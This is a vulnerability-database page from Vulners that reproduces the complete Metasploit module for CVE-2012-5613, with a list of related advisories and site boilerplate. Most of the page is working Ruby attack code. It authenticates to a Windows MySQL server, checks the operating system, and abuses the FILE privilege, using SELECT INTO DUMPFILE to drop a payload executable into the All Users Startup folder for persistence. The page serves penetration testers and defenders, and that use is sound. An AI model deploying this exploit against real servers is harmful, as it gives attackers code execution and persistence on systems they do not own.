Vulners
Lucene search
Oracle MySQL (Windows) - FILE Privilege Abuse (Metasploit)
| Reporter | Title | Published | Views | Family All 34 |
|---|---|---|---|---|
 | Oracle MySQL for Microsoft Windows MOF Execution Vulnerability | 6 Dec 201200:00 | – | zdt |
| Oracle MySQL for Microsoft Windows FILE Privilege Abuse Exploit | 14 Jan 201500:00 | – | zdt |
 | Exploit for CVE-2012-5613 | 9 Feb 201304:59 | – | githubexploit |
 | CVE-2012-5613 | 2 Dec 201200:00 | – | circl |
 | Oracle MySQL for Windows Elevation of Privilege (CVE-2012-5613) | 9 Jun 201300:00 | – | checkpoint_advisories |
 | CVE-2012-5613 | 3 Dec 201200:00 | – | cve |
 | CVE-2012-5613 | 3 Dec 201200:00 | – | cvelist |
 | Oracle MySQL (Windows) - MOF Execution (Metasploit) | 6 Dec 201200:00 | – | exploitdb |
 | GLSA-201308-06 : MySQL: Multiple vulnerabilities | 30 Aug 201300:00 | – | nessus |
| SuSE 11.2 Security Update : MySQL (SAT Patch Number 7251) | 10 Feb 201300:00 | – | nessus |
10
##
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::MYSQL
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Oracle MySQL for Microsoft Windows FILE Privilege Abuse',
'Description' => %q{
This module takes advantage of a file privilege misconfiguration problem
specifically against Windows MySQL servers. This module abuses the FILE
privilege to write a payload to Microsoft's All Users Start Up directory
which will execute every time a user logs in. The default All Users Start
Up directory used by the module is Windows 7 friendly.
},
'Author' =>
[
'sinn3r',
'Sean Verity <veritysr1980[at]gmail.com'
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => 'true'
},
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2012-5613'], #DISPUTED
['OSVDB', '88118'],
['EDB', '23083'],
['URL', 'http://seclists.org/fulldisclosure/2012/Dec/13']
],
'Platform' => 'win',
'Targets' =>
[
[ 'MySQL on Windows', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 01 2012'
))
register_options(
[
OptString.new('USERNAME', [ true, 'The username to authenticate as']),
OptString.new('PASSWORD', [ true, 'The password to authenticate with']),
OptString.new('STARTUP_FOLDER', [ true, 'The All Users Start Up folder', '/programdata/microsoft/windows/start menu/programs/startup/'])
])
end
def check
m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
return Exploit::CheckCode::Safe unless m
return Exploit::CheckCode::Appears if is_windows?
Exploit::CheckCode::Safe
end
def peer
"#{rhost}:#{rport}"
end
def query(q)
rows = []
begin
res = mysql_query(q)
return rows unless res
res.each_hash do |row|
rows << row
end
rescue RbMysql::ParseError
return rows
end
rows
end
def is_windows?
r = query("SELECT @@version_compile_os;")
r[0]['@@version_compile_os'] =~ /^Win/ ? true : false
end
def get_drive_letter
r = query("SELECT @@tmpdir;")
drive = r[0]['@@tmpdir'].scan(/^(\w):/).flatten[0] || ''
drive
end
def upload_file(bin, dest)
p = bin.unpack("H*")[0]
query("SELECT 0x#{p} into DUMPFILE '#{dest}'")
end
def exploit
unless datastore['STARTUP_FOLDER'].start_with?('/') && datastore['STARTUP_FOLDER'].end_with?('/')
fail_with(Failure::BadConfig, "STARTUP_FOLDER should start and end with '/' Ex: /programdata/microsoft/windows/start menu/programs/startup/")
end
print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
begin
m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
rescue RbMysql::AccessDeniedError
fail_with(Failure::NoAccess, "#{peer} - Access denied")
end
fail_with(Failure::NoAccess, "#{peer} - Unable to Login") unless m
unless is_windows?
fail_with(Failure::NoTarget, "#{peer} - Remote host isn't Windows")
end
begin
drive = get_drive_letter
rescue RbMysql::ParseError
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name")
end
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") unless drive
exe_name = Rex::Text::rand_text_alpha(5) + ".exe"
dest = "#{drive}:#{datastore['STARTUP_FOLDER']}#{exe_name}"
exe = generate_payload_exe
print_status("#{peer} - Uploading to '#{dest}'")
begin
upload_file(exe, dest)
rescue RbMysql::AccessDeniedError
fail_with(Failure::NotVulnerable, "#{peer} - No permission to write. I blame kc :-)")
end
register_file_for_cleanup("#{dest}")
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Jan 2015 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 26
EPSS0.88755